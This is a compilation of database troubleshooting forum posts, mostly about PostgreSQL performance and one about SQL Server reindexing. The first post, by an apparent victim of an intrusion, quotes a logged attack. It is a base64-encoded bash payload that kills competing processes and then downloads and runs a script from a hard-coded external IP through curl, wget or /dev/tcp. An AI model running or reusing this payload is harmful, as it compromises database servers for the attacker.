Unwanted query executed in Postgresql - postgresql

I have recently moved my database from azure to self-hosted postgresql.
But the VM utilization of database server spikes upto 100% and stays at the same for hours even though no heavy operations are being performed.
After that, the database shuts down. This is happening at regular interval.
Resized the database to higher configuration and since then utilization goes upto 50% and stays there but the database get shut down.
After checking the logs, found this query being executed which is not at all related to my project.
CREATE TABLE UofsVBqD(cmd_output text);
'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC40MC4yNDMuMjA1L3BnLnNofGJhc2gKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAxOTQuNDAuMjQzLjIwNS9wZy5zaHxiYXNoCmVsc2UKICBfX2N1cmwgaHR0cDovLzE5NC40MC4yNDMuMjA1L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';
Here I am attaching logs of the spikes


PostgreSQL: even read access changes data files disk leading to large incremental backups using pgbackrest

We are using pgbackrest to backup our database to Amazon S3. We do full backups once a week and an incremental backup every other day.
Size of our database is around 1TB, a full backup is around 600GB and an incremental backup is also around 400GB!
We found out that even read access (pure select statements) on the database has the effect that the underlying data files (in /usr/local/pgsql/data/base/xxxxxx) change. This results in large incremental backups and also in very large storage (costs) on Amazon S3.
Usually the files with low index names (e.g. 391089.1) change on read access.
On an update, we see changes in one or more files - the index could correlate to the age of the row in the table.
Some more facts:
Postgres version 13.1
Database is running in docker container (docker version 20.10.0)
OS is CentOS 7
We see the phenomenon on multiple servers.
Can someone explain, why postgresql changes data files on pure read access?
We tested on a pure database without any other resources accessing the database.
This is normal. Some cases I can think of right away are:
a SELECT or other SQL statement setting a hint bit
This is a shortcut for subsequent statements that access the data, so they don't have t consult the commit log any more.
a SELECT ... FOR UPDATE writing a row lock
autovacuum removing dead row versions
These are leftovers from DELETE or UPDATE.
autovacuum freezing old visible row versions
This is necessary to prevent data corruption if the transaction ID counter wraps around.
The only way to fairly reliably prevent PostgreSQL from modifying a table in the future is:
never perform an INSERT, UPDATE or DELETE on it
run VACUUM (FREEZE) on the table and make sure that there are no concurrent transactions

What does WALInitSync actually mean?

I am using postgresql and pgadmin. I had a table (about 12 million rows) from another database which I wanted to transfer to a table in a new database. So I created a custom backup of that table and tried restore for the new table. The Restore job has been running for a while now (about an hour). In pgadmin's database activity panel, I see:
the activity on the DB table I am trying to restore (social) is idle. The active session WAIT event says WALInitSync. I looked it up on postgresql documentation, it says
Waiting for a newly initialized WAL file to reach stable storage.
What does this mean? And why is it taking so long?

Small UPDATE makes hang issue

PostgreSQL 9.5.
A very small update SQL uses very high CPU for a long time like a hang.
My Windows console application uses a simple UPDATE statement to update the latest time as follows.
UPDATE META_TABLE SET latest_time = current_timestamp WHERE host = 'MY_HOST'
There are just 2 console applications which issue above SQL.
No index on META_TABLE.
Only 1 row.
When it is hanging, no lock information.
IDLE status in pg_stat_activity
Commit after UPDATE.
During that the hang time, I can INSERT or DELETE data with the table above.
After starting the application, about in 20 minutes, this issue happens.
I think it is not a SQL statement or table structure issue, probably something wrong in a database side.
Can you guess anything to resolve this issue?
There are 2 db connections in the console application. 1 for Select & 1 for DML.
I tried to close DML DB connection every 2 minutes. Then, I haven't seen the issue!! However, the hang issue happened on SELECT statement (also very simple SELECT).
It seems that there is a some limit per the session.
Now, I am also closing the Select db connection as well per 3 minutes and monitoring.

Postgresql / INSERT performance fall when doing a single SELECT during a batch of INSERTs

Using PostgreSQL (9.6), for a custom synchronisation project, we have an agent that make a lot of INSERTs between a database_1 and database_2 when syncing data.
For example: DB2 is down during 5 minutes, there are 40,000 new lines in DB1, so when DB2 is up again, all the 40,000 lines will be immediately synced from DB1 to DB2.
All this works great.
During the synchronisation, the INSERT rate is around 1000 lines / second.
However, when we do a simple SELECT count(*) FROM table during the sync (in the middle of these thousands of INSERTs), we noticed that the INSERT rate is falling town to a few dozens per second (instead of 1000x per second).
Is there any reason why a SELECT operation (made inside pgAdmin, by another process than the syncing process) is slowing down the batch of INSERT ?
Any locking or internal reason that might explain this?
Or should I provide more information? How can I debug more?
Logs are fully activated and all the INSERTs always take around 0.700ms (before slowdown and same during slowdown), it doesn't change.
INSERTs are currently performed one row by one row
(I'll be happy to provide more information)

SQL queries running slowly or stuck after DBCC DBReindex or Alter Index

SQL 2005 sp3, database is about 70gb in size. Once in a while when I reindex all of my indexes in all of my tables, the front end seems to freeze up or run very slowly. These are queries coming from the front end, not stored procedures in sql server. The front end is using JTDS JDBC connection to access the SQL Server. If we stop and restart the web services sending the queries the problem seems to go away. It is my understandning that we have a connection pool in which we re-use connections and dont establish a new connection each time.
This problem does not happen every time we reindex. I have tried both ways with dbcc dbreindex and alter index online = on and sort in tempdb = on.
Any insight into why this problem occurs once in a while and how to prevent this problem would be very helpful.
Thanks in advance,
Gary Abbott
When this happens next time, look into sys.dm_exec_requests to see what is blocking the requests from the clients. The blocking_session_id will indicate who is blocking, and the wait_type and wait_resource will indicate what is blocking on. You can also use the Activity Monitor to the same effect.
On a pre-grown database an online index rebuild will not block normal activity 9select/insert/update/delete). The load on the server may increase as a result of the online index rebuild and this could result in overall slower responses, but should not cause blocking.
If the database is not pre-grown though then the extra allocations of the index rebuild will trigger database growth events, which can be very slow if left default at 10% increments and without instant file initialisation enabled. During a database growth event all activity is frozen in that database, and this may be your problem even if the indexes are rebuilt online. Again, Activity Monitor and sys.dm_exec_requests would both clearly show this as happening.